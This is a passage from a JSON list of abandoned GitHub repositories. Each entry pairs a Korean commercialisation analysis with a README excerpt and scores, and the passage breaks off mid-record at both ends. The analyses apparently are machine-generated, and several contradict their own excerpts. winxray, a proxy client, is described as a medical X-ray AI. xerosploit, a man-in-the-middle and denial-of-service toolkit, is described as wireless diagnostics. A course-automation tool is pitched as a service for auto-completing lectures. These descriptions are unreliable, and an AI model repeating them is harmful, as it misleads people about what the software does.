[https://github.com/Gerapy/Docs](https://github.com/Gerapy/Docs).\n\n## Support\n\nGerapy is developed based on Python 3.x. Python 2.x may be supported later.\n\n## Usage\n\nInstall Gerapy by pip:\n\n```bash\npip3 install gerapy\n```\n\nAfter the installation, you need to do ","composite_score":0.5272,"license_safety_tag":"safe"},{"name":"trufflesuite/ganache-cli","github_url":"https://github.com/trufflesuite/ganache-cli","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":28,"description":"# Ganache-cli 저장소 분석\n\n## 왜 보물인가\n블록체인 개발자들이 자신의 컴퓨터에서 가상의 암호화폐 거래 환경을 만들어 테스트할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 블록체인 학습 플랫폼에서 사용자가 직접 스마트계약을 작성하고 테스트하는 환경 제공\n2. **내부 업무 도구**: 암호화폐 거래소나 ","readme_excerpt":"<!-- Using h2 instead of h1 because npm doesn't support align=center on h1 tags -->\n<h2 align=\"center\">\n  <a href=\"#readme\" title=\"Ganache README.md\"><img alt=\"Ganache\" src=\"https://raw.githubusercontent.com/trufflesuite/ganache/develop/docs/assets/img/ganache-logo-dark.svg\" alt=\"Ganache\" width=\"160\"/></a>\n</h2>\n\n<h3 align=\"center\">\n  A tool for creating a local blockchain for fast Ethereum development.\n</h3>\n\n<p align=\"center\">\n  <a title=\"ganache on npm\" href=\"https://www.npmjs.com/ganache\"><img alt=\"\" src=\"https://img.shields.io/npm/v/ganache/latest?label=npm&amp;color=b98b5b&amp;style=for-the-badge&amp;labelColor=3c2c30&amp;logo=data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA0MCA0MCI+PHBhdGggZD0iTTAgMGg0MHY0MEgwVjB6IiBmaWxsPSIjZmZmIi8+PHBhdGggZmlsbD0iIzMzMjUyYSIgZD0iTTcgN2gyNnYyNmgtN1YxNGgtNnYxOUg3eiIvPjwvc3ZnPgo=\" /></a>\n  <a href=\"https://npmtrends.com/ganache\" title=\"Historic Ganache download graphs on npmtrends.com\"><img alt=\"\" ","composite_score":0.5271,"license_safety_tag":"safe"},{"name":"TheMRLL/winxray","github_url":"https://github.com/TheMRLL/winxray","stars":5,"language":"","license":"Unlicense","abandonment_months":27,"description":"# TheMRLL/winxray 저장소 분석\n\n## 왜 보물인가\n엑스레이 이미지를 자동으로 분석해 의료 진단을 돕는 AI 도구로, 의료 현장의 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 영상 판독 SaaS**: 병원이 구독하는 클라우드 서비스로 엑스레이 자동 분석 결과를 실시간 제공\n2. **진단 보조 내부 도구**: 의료","readme_excerpt":"﻿\n      WinXray V4.4 修复托盘右键扫一扫导入节点报错！\n      \n\n导语：\n     请使用用官网地址下载：https://www.winxray.com\n     \n![xray](./screenshots/Xray.png)\n\n  WinXray是一个支持 [Xray/V2Ray(vmess/vless/xtls)、Shadowsocks、Trojan、Trojan-go](https://github.com/XTLS/Xray-core)、SSR、NaïveProxy、 等等 网络代理的通用客户端（Windows系统），可自动检测并连接访问速度最快的代理服务器。服务器连接异常时可以自动更换代理服务器 - 再也不用担心服务器抽风了。winXray 也提供一键安装 XRay(V2Ray、Shadowsocks、Trojan) 服务器工具。\n\n  \n之前我用过很多代理客户端，经常用一会就挂掉了，有些测试很久才找到下一个可用的服务器，有时怎么切换都不行，一定要把整个软件退出重启才能恢复。而且在WIN10上都有相同的BUG:PAC代理用一段时间就会卡死( winXray已经通过自行实现PAC服务器解决了这个问题 )，其实这些软件里提供的很多功能我并不需要，我只想愉快地用下 google 找点技术资料提升工作效率。但是在网上找了很久都没找到适合的软件，于是决定自己动手写一个，还好用 aardio 写软件的速度很快 - 大概用了几个小时就完成了 winXray 的主要代码，改进了几个版本以后就很稳定了，**我自己用了 WinXray  几个月再也没有遇到 google 抽风访问不了的问题**。    \n\n一些网友对 WinXray 的测速功能存在误解，简单的测速不但不必要的消耗流量而且没有什么实用价值，例如Ping通了TCP访问不了，TCP通了但浏览器被阻断，或者下载测速需要连接代理服务器以后长时间测试才能得到下载速度 - 如果有很多服务器需要频繁快速地测速这样显然是不行的。**根据我长时间的实测，我使用一堆的服务器，大多时候 WinXray 都能最快的找到其中速度最快、且能正常使用的线路**。要考虑到网络速度与服务器响应速度本来就是波动的，**WinXray 能在连接代理服务器以前在零点几秒以内快速地在上百个代理服务器中找出最快的服务器** -","composite_score":0.5271,"license_safety_tag":"unknown"},{"name":"trufflesuite/ganache","github_url":"https://github.com/trufflesuite/ganache","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":28,"description":"# Ganache 저장소 분석\n\n## 왜 보물인가\n블록체인 개발자들이 실제 환경을 구축하기 전에 안전하게 테스트할 수 있는 개인용 블록체인 시뮬레이터입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블록체인 개발 환경을 클라우드에서 제공하는 온라인 IDE 플랫폼\n2. **내부 업무 도구**: 블록체인 스타트업의 개발팀이 신규 기능 테스트 자","readme_excerpt":"<!-- Using h2 instead of h1 because npm doesn't support align=center on h1 tags -->\n<h2 align=\"center\">\n  <a href=\"#readme\" title=\"Ganache README.md\"><img alt=\"Ganache\" src=\"https://raw.githubusercontent.com/trufflesuite/ganache/develop/docs/assets/img/ganache-logo-dark.svg\" alt=\"Ganache\" width=\"160\"/></a>\n</h2>\n\n<h3 align=\"center\">\n  A tool for creating a local blockchain for fast Ethereum development.\n</h3>\n\n<p align=\"center\">\n  <a title=\"ganache on npm\" href=\"https://www.npmjs.com/ganache\"><img alt=\"\" src=\"https://img.shields.io/npm/v/ganache/latest?label=npm&amp;color=b98b5b&amp;style=for-the-badge&amp;labelColor=3c2c30&amp;logo=data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA0MCA0MCI+PHBhdGggZD0iTTAgMGg0MHY0MEgwVjB6IiBmaWxsPSIjZmZmIi8+PHBhdGggZmlsbD0iIzMzMjUyYSIgZD0iTTcgN2gyNnYyNmgtN1YxNGgtNnYxOUg3eiIvPjwvc3ZnPgo=\" /></a>\n  <a href=\"https://npmtrends.com/ganache\" title=\"Historic Ganache download graphs on npmtrends.com\"><img alt=\"\" ","composite_score":0.5271,"license_safety_tag":"safe"},{"name":"TachibanaYoshino/AnimeGAN","github_url":"https://github.com/TachibanaYoshino/AnimeGAN","stars":7,"language":"Python","license":"unknown","abandonment_months":46,"description":"# AnimeGAN 상용화 분석\n\n## 왜 보물인가\n평범한 사진을 애니메이션 그림 스타일로 자동 변환해주는 기술로, 콘텐츠 제작자들의 작업 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트에서 사진을 업로드하면 애니메이션 이미지로 변환해주는 구독형 온라인 도구\n2. **내부 업무 도구**: 게임/웹툰 제","readme_excerpt":"# AnimeGAN    \nA Tensorflow implementation of AnimeGAN for fast photo animation ! &ensp;&ensp;&ensp;&ensp;[日本語](https://github.com/TachibanaYoshino/AnimeGAN/blob/master/doc/Japanese_README.md)  \nThe paper can be accessed [here](https://github.com/TachibanaYoshino/AnimeGAN/blob/master/doc/Chen2020_Chapter_AnimeGAN.pdf) or on the [website](https://link.springer.com/chapter/10.1007/978-981-15-5577-0_18).  \n    \n### If you like what I'm doing you can tip me on [*patreon*](https://www.patreon.com/Asher_Chan).    \n   \nPhotos [![Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://drive.google.com/file/d/1PbBkmj1EhULvEE8AXr2z84pZ2DQJN4hc/view?usp=sharing)   \n    \nVideos [![Colab for videos](https://colab.research.google.com/assets/colab-badge.svg)](https://drive.google.com/file/d/1qhBxA72Wxbh6Eyhd-V0zY_jTIblP9rHz/view?usp=sharing)    \n____\n* Added the AnimeGAN [Colab](https://drive.google.com/file/d/1PbBkmj1EhULvEE8AXr2z84pZ2DQJN4hc/view?usp=sharing).  \n* [**AnimeGANv3**]","composite_score":0.5268,"license_safety_tag":"unknown"},{"name":"github/SoftU2F","github_url":"https://github.com/github/SoftU2F","stars":9,"language":"Swift","license":"MIT","abandonment_months":66,"description":"# SoftU2F 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 컴퓨터 해킹으로부터 계정을 보호하는 소프트웨어 방식의 보안 열쇠 역할을 하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 기관의 SaaS 서비스**: 은행 앱이나 증권사 서비스에 내장되어 사용자 계정 탈취 방지\n2. **기업 내부 업무 도구**: 회사 직원들의 이메일, 클라우드 드라이브","readme_excerpt":"# SoftU2F is no longer supported\n\nThe SoftU2F project is deprecated and no longer supported. SoftU2F was created\nto support Touch ID for U2F when browsers did not support it, but the functionality is now\navailable on macOS using Touch ID in:\n\n- Safari (macOS 11.0 Big Sur)\n- Google Chrome\n\nSoftU2F has several compatibility issues that will not be fixed, so we recommend\nswitching to one of these alternatives.\n\nThanks to everyone who used SoftU2F over the years, and special thanks to Ben\nToews for writing and maintaining the original implementation!\n\n<br><br><br><br><br><br>\n--------\n<br><br><br><br><br><br>\n\n![](https://user-images.githubusercontent.com/1144197/28190263-470a80d2-67e7-11e7-81e6-17895d70bf75.png)\n\nSoft U2F is a software U2F authenticator for macOS. It emulates a hardware U2F HID device and performs cryptographic operations using the macOS Keychain. This tool works with Google Chrome/Chromium, Safari, Firefox and Opera's built-in U2F implementations.\n\nWe take the security o","composite_score":0.5268,"license_safety_tag":"safe"},{"name":"chrieke/awesome-satellite-imagery-datasets","github_url":"https://github.com/chrieke/awesome-satellite-imagery-datasets","stars":5,"language":"","license":"MIT","abandonment_months":47,"description":"# 위성 위성 이미지 데이터셋 컬렉션 분석\n\n## 왜 보물인가\n전 세계의 위성 사진 데이터를 한 곳에 모아놓아서, 도시 계획, 농업, 재난 관리 등 다양한 분야의 전문가들이 쉽게 찾아 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산 개발사를 위한 \"토지 분석 플랫폼\"으로 위성 사진으로 땅의 특성을 자동 분석해주는 웹 서비스\n","readme_excerpt":"*The list is now **archived**. Please see these fantastic ressources for more recent datasets:\n[satellite-image-deepl-learning](https://github.com/robmarkcole/satellite-image-deep-learning#datasets) &\n[Awesome_Satellite_Benchmark_Datasets](https://github.com/Seyed-Ali-Ahmadi/Awesome_Satellite_Benchmark_Datasets)*\n\n# Awesome Satellite Imagery Datasets [![Awesome](https://awesome.re/badge-flat.svg)](https://awesome.re)\n\nList of aerial and satellite imagery datasets with annotations for computer vision and deep learning. Newest datasets at the top of each category (Instance segmentation, object detection, semantic segmentation, scene classification, other).   \n\n![](figures/header_img.jpg)  \n\n## Recent additions and ongoing competitions\n\n- [**FloodNet**](https://github.com/BinaLab/FloodNet-Supervised_v1.0) *(University of Maryland, Jun 2021)*  \n  2343 image chips (drone imagery), 10 landcover categories (background, water, building flooded, building non-flooded,\n  road-flooded, ...). Paper","composite_score":0.5267,"license_safety_tag":"safe"},{"name":"Arturus/kaggle-web-traffic","github_url":"https://github.com/Arturus/kaggle-web-traffic","stars":8,"language":"Jupyter Notebook","license":"MIT","abandonment_months":44,"description":"# Arturus/kaggle-web-traffic 분석\n\n## 왜 보물인가\n웹사이트 방문자 수를 미래에 예측하는 기술로, 온라인 비즈니스의 성장 계획을 세우는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 블로거나 소규모 온라인 사업가를 위한 \"다음 달 방문자 예측 대시보드\" 구독 서비스\n- **내부 업무 도구**:","readme_excerpt":"# Kaggle Web Traffic Time Series Forecasting\n1st place solution\n\n![predictions](images/predictions.png)\n\nMain files:\n * `make_features.py` - builds features from source data\n * `input_pipe.py` - TF data preprocessing pipeline (assembles features\n  into training/evaluation tensors, performs some sampling and normalisation)\n * `model.py` - the model\n * `trainer.py` - trains the model(s)\n * `hparams.py` - hyperpatameter sets.\n * `submission-final.ipynb` - generates predictions for submission\n\nHow to reproduce competition results:\n1. Download input files from https://www.kaggle.com/c/web-traffic-time-series-forecasting/data :\n`key_2.csv.zip`, `train_2.csv.zip`, put them into `data` directory.\n2. Run `python make_features.py data/vars --add_days=63`. It will\nextract data and features from the input files and put them into\n`data/vars` as Tensorflow checkpoint.\n3. Run trainer:\n`python trainer.py --name s32 --hparam_set=s32 --n_models=3 --name s32 --no_eval --no_forward_split\n --asgd_decay=0.9","composite_score":0.5266,"license_safety_tag":"safe"},{"name":"lcodecorex/TwinklingRefreshLayout","github_url":"https://github.com/lcodecorex/TwinklingRefreshLayout","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":39,"description":"# TwinklingRefreshLayout 사업화 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면을 아래로 당겨 새로운 정보를 불러오는 '새로고침' 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 뉴스 앱, SNS 플랫폼 등 실시간 콘텐츠 업데이트가 필요한 구독형 모바일 서비스\n- **내부 업무 도구**: 대형","readme_excerpt":"## 【DECREEPTED】\n\n# TwinklingRefreshLayout\n[中文文档](./README_CN.md)\n\nTwinklingRefreshLayout extended the thoughts of SwipeRefreshLayout,using a ViewGroup to include a list of Views, to maintain its low coupling and high versatility. Follows are its main features.\n\n - New overscroll animations, running smoothly, much better than iOS.\n - Support RecyclerView, ScrollView, AbsListView, WebView and so on.\n - Support to load more.\n - Default support cross-border rebound.\n - You can open a pure bounds rebound mode.\n -  Lots of methods in the class OnRefreshListener.\n - It provides an interface to the callback during the sliding coefficient. Personalized offer good support.\n - NestedScroll,CoordinatorLayout\n\n **Any View is supported.**\n\n![](art/structure_v1.0.png)\n\n## Demo\n[Download Demo](art/app-debug.apk)\n\n![](art/gif_recyclerview.gif)  ![](art/gif_listview.gif)  ![](art/gif_gridview.gif) ![](art/gif_recyclerview2.gif) ![](art/gif_scrollview.gif)  ![](art/gif_webview.gif)\n\nYou can download thes","composite_score":0.5266,"license_safety_tag":"safe"},{"name":"instillai/deep-learning-roadmap","github_url":"https://github.com/instillai/deep-learning-roadmap","stars":5,"language":"Python","license":"MIT","abandonment_months":42,"description":"# deep-learning-roadmap 분석\n\n## 왜 보물인가\n인공지능을 처음 배우려는 사람들을 위해 체계적인 학습 경로를 제시하는 오픈소스 가이드로, 혼란스러운 학습을 명확하게 정리해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 학습 플랫폼 (SaaS)**: 유데미나 코세라 같은 강좌 사이트에서 \"AI 학습 경로\" 유료 가이드로 판매\n2. *","readme_excerpt":"###################################################\nDeep Learning - All You Need to Know\n###################################################\n\n.. image:: https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat\n    :target: https://github.com/osforscience/deep-learning-all-you-need/pulls\n.. image:: https://badges.frapsoft.com/os/v2/open-source.png?v=103\n    :target: https://github.com/ellerbrock/open-source-badge/\n.. image:: https://img.shields.io/pypi/l/ansicolortags.svg\n      :target: https://github.com/osforscience/deep-learning-all-you-need/blob/master/LICENSE\n.. image:: https://img.shields.io/twitter/follow/machinemindset.svg?label=Follow&style=social\n      :target: https://twitter.com/machinemindset\n      \n##########################################################################\nSponsorship\n##########################################################################\n\nTo support maintaining and upgrading this project, please kindly consider `Sponsoring the proje","composite_score":0.5265,"license_safety_tag":"safe"},{"name":"LionSec/xerosploit","github_url":"https://github.com/LionSec/xerosploit","stars":5,"language":"Ruby","license":"gpl-3.0","abandonment_months":39,"description":"# xerosploit 보물 분석 보고서\n\n## 왜 보물인가\n무선 네트워크를 진단하고 보안 문제를 찾는 오픈소스 도구로, 정보보안 업체와 IT관리자들의 필수 작업을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 대상 '무선네트워크 보안진단 클라우드 서비스' - 매달 자동으로 회사 와이파이를 검사해주는 구독형 서비스\n","readme_excerpt":"\n[![Version](https://img.shields.io/badge/Xerosploit-Version_1.0-brightgreen.svg?maxAge=259200)]()\n[![PyPI](https://img.shields.io/badge/Python-2.7-blue.svg)]()\n[![Build](https://img.shields.io/badge/Supported_OS-linux-orange.svg)]()\n[![AUR](https://img.shields.io/aur/license/yaourt.svg)]()\n\nXerosploit\n=\nXerosploit is a penetration testing toolkit whose goal is to perform man in the middle attacks for testing purposes. It brings various modules that allow to realise efficient attacks, and also allows to carry out denial of service attacks and port scanning.\nPowered by <a href=\"https://www.bettercap.org\"> bettercap</a> and <a href=\"https://www.bettercap.org\"> nmap</a>.\n\n![](http://i.imgur.com/bbr48Ep.png)\n\nDependencies\n=\n\n- nmap \n- hping3 \n- build-essential \n- ruby-dev \n- libpcap-dev \n- libgmp3-dev\n- tabulate \n- terminaltables\n\n\n\n\nInstalation\n=\nDependencies will be automatically installed.\n\n    git clone https://github.com/LionSec/xerosploit\n    cd xerosploit && sudo python install.py\n ","composite_score":0.5265,"license_safety_tag":"restricted"},{"name":"thunlp/WantWords","github_url":"https://github.com/thunlp/WantWords","stars":91,"language":"JavaScript","license":"unknown","abandonment_months":52,"description":"# WantWords 상용화 분석\n\n## 왜 보물인가\n사용자가 원하는 단어의 의미를 설명하면 정확한 단어를 찾아주는 '역방향 사전'으로, 글쓰기, 외국어 학습, 콘텐츠 제작 시 막힐 때마다 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 글쓰기 보조 도구 (블로거, 작가, 학생용 웹 앱으로 월 구독 판매)\n2. **내부 업","readme_excerpt":"### [中](README_ZH.md)|En\n<p align=\"center\">\n  <a href=\"https://wantwords.thunlp.org/\">\n  \t<img src=\"resources/wantwords_logo.svg\" width = \"300\"  alt=\"WantWords Logo\"  />\n  </a>\n</p>\n<h3 align=\"center\">An Open-source Online Reverse Dictionary [<a href=\"https://wantwords.net/\">link</a>] </h3>\n\n## News\n\nThe WantWords MiniProgram has been launched. Welcome to scan the following QR code to try it!\n<div align=center>\n<img src=\"resources/miniprogram.jpg\" width = \"300\"  alt=\"MiniProgram QR code\"/>\n</div>\n\n\n\n## What Is a Reverse Dictionary?\nOpposite to a regular (forward) dictionary that provides definitions for query words, a reverse dictionary returns words semantically matching the query descriptions.\n\n<div align=center>\n<img src=\"resources/rd_example.png\" alt=\"rd_example\" width = \"600\"/>\n</div>\n\n## What Can a Reverse Dictionary Do?\n* Solve the *tip-of-the-tongue problem*, the phenomenon of failing to retrieve a word from memory\n* Help new language learners\n* Help word selection (or word dic","composite_score":0.5265,"license_safety_tag":"unknown"},{"name":"vuejs/vue-test-utils","github_url":"https://github.com/vuejs/vue-test-utils","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":28,"description":"# Vue Test Utils 상업화 분석\n\n## 왜 보물인가\n웹 애플리케이션의 품질을 자동으로 검증하는 필수 도구로, 버그를 사전에 찾아내어 사용자 만족도를 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 협업 도구(프로젝트 관리, 디자인 협업 등)에서 기능 변경 시 자동으로 버그를 감지하는 품질 검증 플랫폼\n2. ","readme_excerpt":"# Vue Test Utils [![Build Status](https://circleci.com/gh/vuejs/vue-test-utils/tree/dev.png?style=shield)](https://circleci.com/gh/vuejs/vue-test-utils)\n\nComponent testing utils for Vue 2.\n\n## Packages\n\nThis repository provides the following two packages:\n\n- [Vue Test Utils](./packages/test-utils)\n- [Vue Server Test Utils](./packages/server-test-utils)\n\nYou can install these packages by the following command.\n\n```\nnpm install --save-dev @vue/test-utils@1\nnpm install --save-dev @vue/server-test-utils@1\n```\n\n## Peer Dependencies\n\nYou need to install `vue-template-compiler` which is used to compile components. It should be the same version as the version of Vue you are using.\n\n```\nnpm install --save-dev vue-template-compiler\n```\n\n## Documentation\n\nRefer to the [documentation](https://v1.test-utils.vuejs.org/)\n\n## Questions\n\nFor questions and support please use the [Discord chat room](https://vue-land.js.org/) or [the official forum](http://forum.vuejs.org). The issue list of this repo is ","composite_score":0.5264,"license_safety_tag":"safe"},{"name":"CodFrm/cxmooc-tools","github_url":"https://github.com/CodFrm/cxmooc-tools","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":52,"description":"# CodFrm/cxmooc-tools 분석\n\n## 왜 보물인가\n온라인 강의 플랫폼에서 반복적인 학습 작업을 자동으로 처리해주는 도구로, 학생들의 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학생 대상 \"강의 자동 완료 도우미\" 웹사이트 운영\n2. **내부 업무 도구**: 온라인 교육 기관에서 학생 학습 진도 ","readme_excerpt":"<div align=\"center\">\n<h1 align=\"center\">\n网课小工具\n</h1>\n\n![GitHub stars](https://img.shields.io/github/stars/codfrm/cxmooc-tools.svg)\n[![Build Status](https://github.com/CodFrm/cxmooc-tools/workflows/build/badge.svg?branch=master)](https://github.com/CodFrm/cxmooc-tools)\n![GitHub tag (latest SemVer)](https://img.shields.io/github/tag/codfrm/cxmooc-tools.svg?label=version)\n[![Chrome](https://img.shields.io/badge/chrome-success-brightgreen)](https://chrome.google.com/webstore/detail/%E8%B6%85%E6%98%9F%E6%85%95%E8%AF%BE%E5%B0%8F%E5%B7%A5%E5%85%B7/kkicgcijebblepmephnfganiiochecfl?hl=zh-CN)\n[![FireFox](https://img.shields.io/badge/firefox-success-brightgreen)](https://addons.mozilla.org/zh-CN/firefox/addon/%E8%B6%85%E6%98%9F%E6%85%95%E8%AF%BE%E5%B0%8F%E5%B7%A5%E5%85%B7/)\n[![tampermonkey](https://img.shields.io/badge/tampermonkey-success-yellowgreen)](https://bbs.tampermonkey.net.cn/thread-61-1-1.html)\n![GitHub All Releases](https://img.shields.io/github/downloads/CodFrm/cxmooc-tools/total)\n[![","composite_score":0.5262,"license_safety_tag":"safe"},{"name":"rome/tools","github_url":"https://github.com/rome/tools","stars":14,"language":"Rust","license":"MIT","abandonment_months":33,"description":"# rome/tools 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱을 만드는 개발자들이 코드 품질을 자동으로 점검하고 개선해주는 통합 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발팀을 위한 클라우드 기반 코드 검사 플랫폼으로 월별 구독 판매\n- **내부 업무 도구**: 소프트웨어 회사가 자사 개발팀의 코드 품질 관리를 자동화하는","readme_excerpt":"\n> [!IMPORTANT]\n> # Welcome to [Biome](https://biomejs.dev/blog/annoucing-biome), the community successor of Rome!\n\n> [!WARNING]\n> # Rome won't be maintained anymore by the same people that maintained it so far. Biome will provide new features and fixes.\n\n<p align=\"center\">\n\t<picture>\n\t\t<source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/rome/brand/main/PNG/logo_white_yellow_transparent.png\" width=\"700\">\n\t\t<img alt=\"Rome's logo depicting an ancient Roman arch with the word Rome to its side\" src=\"https://raw.githubusercontent.com/rome/brand/main/PNG/logo_transparent.png\" width=\"700\">\n\t</picture>\n</p>\n\n<div align=\"center\">\n\n[![MIT licensed][mit-badge]][mit-url]\n[![Discord chat][discord-badge]][discord-url]\n[![CI on main][ci-badge]][ci-url]\n[![npm version][npm-badge]][npm-url]\n[![VSCode version][vscode-badge]][vscode-url]\n\n\n[mit-badge]: https://img.shields.io/badge/license-MIT-blue.svg?color=brightgreen\n[mit-url]: LICENSE\n[discord-badge]: https://img.shi","composite_score":0.5262,"license_safety_tag":"safe"},{"name":"trustedsec/social-engineer-toolkit","github_url":"https://github.com/trustedsec/social-engineer-toolkit","stars":5,"language":"Python","license":"unknown","abandonment_months":19,"description":"# Social Engineer Toolkit 상용화 분석\n\n## 왜 보물인가\n사람들의 심리를 이용한 보안 위협을 시뮬레이션하고 방어하는 도구로, 기업의 보안 약점을 찾아내는 데 핵심적인 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 진단 SaaS**\n- 회사들이 월 구독으로 직원들의 보안 인식을 테스트하고 개선하는 클라우드 서비스\n\n**","readme_excerpt":"# The Social-Engineer Toolkit (SET)\n* Copyright :copyright: 2020\n* Written by: David Kennedy (ReL1K) @HackingDave \n* Company: [TrustedSec](https://www.trustedsec.com)\n\n<br/>\n\n## Description\nThe Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.\n\nDISCLAIMER: This is *only* for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.\nPlease read the LICENSE under readme/LICENSE for the licensing of SET. \n\n#### Supported platforms:\n* Linux\n* Mac OS X (experimental)\n\n# Installation\n\n## Install via requirements.txt\n\n```bash\npip3 install -r requirements.txt\npython3 setup.py \n```\n\n## Install SET\n=======\n#### Mac OS X\nYou will need to use a virtual environment for the Python instal","composite_score":0.5261,"license_safety_tag":"unknown"},{"name":"zwwill/yanxuan-weex-demo","github_url":"https://github.com/zwwill/yanxuan-weex-demo","stars":8,"language":"Java","license":"MIT","abandonment_months":62,"description":"# yanxuan-weex-demo 분석 보고서\n\n## 왜 보물인가\n모바일 앱처럼 빠르고 부드러운 쇼핑 인터페이스를 웹사이트에서 구현할 수 있는 기술을 선양(Yanxuan) 플랫폼 사례로 실제 보여주는 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **쇼핑몰 SaaS**: 중소 이커머스 회사들에게 \"모바일앱 같은 반응형 쇼핑몰 제작 도구\"로 판매\n2. ","readme_excerpt":"English | [简体中文](README.zh-CN.md)\n\n# :art: High quality Weex Demo\n\n![](https://github.com/zwwill/yanxuan-weex-demo/raw/master/banner.png)\n\n> The following is a brief step to run the demo\n> further introduction，you can read this [网易严选App感受WEEX开发](https://github.com/zwwill/blog/issues/3)\n\n\n# Try\n\nopen [Weex Playground](http://weex.apache.org/cn/playground.html) , Scan the qrcode below\n\n![](https://github.com/zwwill/yanxuan-weex-demo/raw/master/erHome.png)\n\n（no optimizing separately for android）\n\n# Run\n\n## install\n\n```\n$ npm install\n```\n\n## run web\n\nbuilding web pro\n\n```\n$ npm run build \n```\n\nbuilding web pro & running service\n\n```\n$ npm run dev & npm run serve \n```\n\n## run ios\n\nios packaging requires developer accounts, f not, you can only install it on your own connected iphone through xcode debugging, or virtual machine。\n\nThe following is the implementation of the non-developer account\n\ninstall ios platform\n\n``` \n$ weexpack platform add ios\n```\n\nbuild weex bundles\n\n```\n$ weex build ios","composite_score":0.526,"license_safety_tag":"safe"},{"name":"bxm0927/canvas-special","github_url":"https://github.com/bxm0927/canvas-special","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":64,"description":"# canvas-special 저장소 분석\n\n## 왜 보물인가\n웹 화면에서 그림을 그리거나 디자인할 수 있는 도구 모음으로, 온라인 협업 디자인 플랫폼이나 교육용 앱의 핵심 기술로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1) 온라인 협업 디자인 도구**: 팀이 함께 화면에 그리고 수정하는 웹 애플리케이션  \n**2) 교육 플랫폼**: 학생들이 ","readme_excerpt":"# 超多经典 canvas 实例\n\n**普及**：`<canvas>` 元素用于在网页上绘制图形。这是一个 HTML 图形容器，必须使用脚本来绘制图形。\n\n**注意**：IE 8 以及更早的版本不支持 `<canvas>` 元素。\n\n## 1. 尤雨溪个人主页炫彩三角纽带效果，点击可变换\n\n[ [源码](https://github.com/bxm0927/canvas-special/blob/master/evan-you) | [演示](https://bxm0927.github.io/canvas-special/evan-you/index.html) ]\n\n![](./assets/evan-you.png)\n\n## 2. 知乎登录注册页动态离子背景效果\n\n[ [源码](https://github.com/bxm0927/canvas-special/blob/master/zhihu) | [演示](https://bxm0927.github.io/canvas-special/zhihu/index.html) ]\n\n![](./assets/zhihu.png)\n\n## 3. 基于 canvas 的五子棋完整功能实现\n\n[ [源码](https://github.com/bxm0927/canvas-special/blob/master/five-chess) | [演示](https://bxm0927.github.io/canvas-special/five-chess/index.html) ]\n\n![](./assets/five-chess.png)\n\n## 4. 基于 canvas 的《是男人就下100层》小游戏完美实现\n\n[ [源码](https://github.com/bxm0927/canvas-special/blob/master/man-down100) | [演示](https://bxm0927.github.io/canvas-special/man-down100/index.html) ]\n\n![](./assets/man-down100.png)\n\n## 5. 毛笔字书写田字格，可以写字\n\n[ [源码](https://github.com/bxm0927/canvas-special/blob/m","composite_score":0.5259,"license_safety_tag":"unknown"},{"name":"cerlymarco/tsmoothie","github_url":"https://github.com/cerlymarco/tsmoothie","stars":7,"language":"Jupyter Notebook","license":"MIT","abandonment_months":30,"description":"# tsmoothie 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터의 패턴을 깔끔하게 정리해주는 도구로, 비즈니스 의사결정을 위한 데이터 분석을 훨씬 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **판매 예측 SaaS**: 월별 매출 데이터의 노이즈를 제거해 다음 달 매출 예측을 제공하는 구독 서비스\n2. **주가/암호화폐 분석 API**: 투자자들","readme_excerpt":"# tsmoothie\n\nA python library for time-series smoothing and outlier detection in a vectorized way.\n\n## Overview\n\ntsmoothie computes, in a fast and efficient way, the smoothing of single or multiple time-series. \n\nThe smoothing techniques available are:\n\n- Exponential Smoothing\n- Convolutional Smoothing with various window types (constant, hanning, hamming, bartlett, blackman)\n- Spectral Smoothing with Fourier Transform\n- Polynomial Smoothing \n- Spline Smoothing of various kind (linear, cubic, natural cubic) \n- Gaussian Smoothing \n- Binner Smoothing \n- LOWESS \n- Seasonal Decompose Smoothing of various kind (convolution, lowess, natural cubic spline)\n- Kalman Smoothing with customizable components (level, trend, seasonality, long seasonality) \n\ntsmoothie provides the calculation of intervals as result of the 